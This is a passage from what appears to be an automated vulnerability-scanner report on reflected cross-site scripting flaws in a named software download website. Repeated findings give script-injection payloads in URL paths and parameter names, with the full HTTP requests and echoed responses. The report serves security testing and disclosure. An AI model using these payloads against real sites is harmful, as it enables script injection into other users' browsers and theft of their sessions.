HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:31:37 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:41:47 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%228%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 81073
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-graphic-apps-downloads-8-0-d.html?6c898"><script>alert(1)</script>5c39625c5a2=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfe96"><script>alert(1)</script>9b581e63618 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categoriesbfe96"><script>alert(1)</script>9b581e63618/free-64-bit-home-hobby-downloads-9-0-d.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:36:22 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21329
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/categoriesbfe96"><script>alert(1)</script>9b581e63618/free-64-bit-home-hobby-downloads-9-0-d.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb1e1"><script>alert(1)</script>16ffae90b65 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-home-hobby-downloads-9-0-d.htmlbb1e1"><script>alert(1)</script>16ffae90b65 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:37:01 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:47:13 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%229%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 90207
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-home-hobby-downloads-9-0-d.htmlbb1e1"><script>alert(1)</script>16ffae90b65" /> ...[SNIP]...
1.203. http://www.x64bitdownload.com/categories/free-64-bit-home-hobby-downloads-9-0-d.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c50ab"><script>alert(1)</script>641fff062a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-home-hobby-downloads-9-0-d.html?c50ab"><script>alert(1)</script>641fff062a5=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:32:45 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:42:49 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%229%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 90210
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-home-hobby-downloads-9-0-d.html?c50ab"><script>alert(1)</script>641fff062a5=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee9dc"><script>alert(1)</script>c8edc30f815 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categoriesee9dc"><script>alert(1)</script>c8edc30f815/free-64-bit-multimedia-design-downloads-258-0-d.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:37:45 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21338
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/categoriesee9dc"><script>alert(1)</script>c8edc30f815/free-64-bit-multimedia-design-downloads-258-0-d.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a5b9"><script>alert(1)</script>2ee9fead789 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-multimedia-design-downloads-258-0-d.html1a5b9"><script>alert(1)</script>2ee9fead789 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:38:31 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:49:04 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22258%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29712
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-multimedia-design-downloads-258-0-d.html1a5b9"><script>alert(1)</script>2ee9fead789" /> ...[SNIP]...
1.206. http://www.x64bitdownload.com/categories/free-64-bit-multimedia-design-downloads-258-0-d.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69348"><script>alert(1)</script>081516f460c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-multimedia-design-downloads-258-0-d.html?69348"><script>alert(1)</script>081516f460c=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:34:55 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:45:06 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22258%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29715
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-multimedia-design-downloads-258-0-d.html?69348"><script>alert(1)</script>081516f460c=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 343da"><script>alert(1)</script>afffd569a53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories343da"><script>alert(1)</script>afffd569a53/free-64-bit-network-internet-downloads-10-0-d.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:35:24 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21336
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/categories343da"><script>alert(1)</script>afffd569a53/free-64-bit-network-internet-downloads-10-0-d.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53512"><script>alert(1)</script>5772985df31 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-network-internet-downloads-10-0-d.html53512"><script>alert(1)</script>5772985df31 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:36:49 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:46:57 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2210%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 79787
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-network-internet-downloads-10-0-d.html53512"><script>alert(1)</script>5772985df31" /> ...[SNIP]...
1.209. http://www.x64bitdownload.com/categories/free-64-bit-network-internet-downloads-10-0-d.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6798"><script>alert(1)</script>34b8fd1d87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-network-internet-downloads-10-0-d.html?f6798"><script>alert(1)</script>34b8fd1d87=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:31:35 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:41:41 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2210%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 79789
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-network-internet-downloads-10-0-d.html?f6798"><script>alert(1)</script>34b8fd1d87=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e35c"><script>alert(1)</script>7c5db426e5d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories4e35c"><script>alert(1)</script>7c5db426e5d/free-64-bit-security-privacy-downloads-11-0-d.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:36:01 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21336
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/categories4e35c"><script>alert(1)</script>7c5db426e5d/free-64-bit-security-privacy-downloads-11-0-d.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b6ea"><script>alert(1)</script>ea41a27d65e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-security-privacy-downloads-11-0-d.html1b6ea"><script>alert(1)</script>ea41a27d65e HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:36:52 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:47:59 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2211%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 86178
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-security-privacy-downloads-11-0-d.html1b6ea"><script>alert(1)</script>ea41a27d65e" /> ...[SNIP]...
1.212. http://www.x64bitdownload.com/categories/free-64-bit-security-privacy-downloads-11-0-d.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e1e9"><script>alert(1)</script>3697cb785d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-security-privacy-downloads-11-0-d.html?5e1e9"><script>alert(1)</script>3697cb785d8=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:33:11 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:43:23 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2211%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 86181
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-security-privacy-downloads-11-0-d.html?5e1e9"><script>alert(1)</script>3697cb785d8=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7021b"><script>alert(1)</script>390428112e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories7021b"><script>alert(1)</script>390428112e3/free-64-bit-servers-downloads-12-0-d.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:37:57 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21327
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/categories7021b"><script>alert(1)</script>390428112e3/free-64-bit-servers-downloads-12-0-d.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 203dc"><script>alert(1)</script>8b744dfd2ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-servers-downloads-12-0-d.html203dc"><script>alert(1)</script>8b744dfd2ce HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:38:52 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:49:01 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2212%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 79904
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-servers-downloads-12-0-d.html203dc"><script>alert(1)</script>8b744dfd2ce" /> ...[SNIP]...
1.215. http://www.x64bitdownload.com/categories/free-64-bit-servers-downloads-12-0-d.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 410cf"><script>alert(1)</script>001936dc891 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-servers-downloads-12-0-d.html?410cf"><script>alert(1)</script>001936dc891=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:35:22 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:45:35 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2212%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 79907
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-servers-downloads-12-0-d.html?410cf"><script>alert(1)</script>001936dc891=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cff48"><script>alert(1)</script>712b29e0247 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categoriescff48"><script>alert(1)</script>712b29e0247/free-64-bit-system-utilities-downloads-13-0-d.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:36:47 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21336
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/categoriescff48"><script>alert(1)</script>712b29e0247/free-64-bit-system-utilities-downloads-13-0-d.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a88d4"><script>alert(1)</script>bde65231c50 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-system-utilities-downloads-13-0-d.htmla88d4"><script>alert(1)</script>bde65231c50 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:37:40 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:47:42 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2213%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 83152
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-system-utilities-downloads-13-0-d.htmla88d4"><script>alert(1)</script>bde65231c50" /> ...[SNIP]...
1.218. http://www.x64bitdownload.com/categories/free-64-bit-system-utilities-downloads-13-0-d.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0a91"><script>alert(1)</script>06180f2151b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-system-utilities-downloads-13-0-d.html?d0a91"><script>alert(1)</script>06180f2151b=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:34:20 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:44:36 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2213%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 83155
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-system-utilities-downloads-13-0-d.html?d0a91"><script>alert(1)</script>06180f2151b=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a1be"><script>alert(1)</script>1593af6f4d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories9a1be"><script>alert(1)</script>1593af6f4d8/free-64-bit-web-development-downloads-14-0-d.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
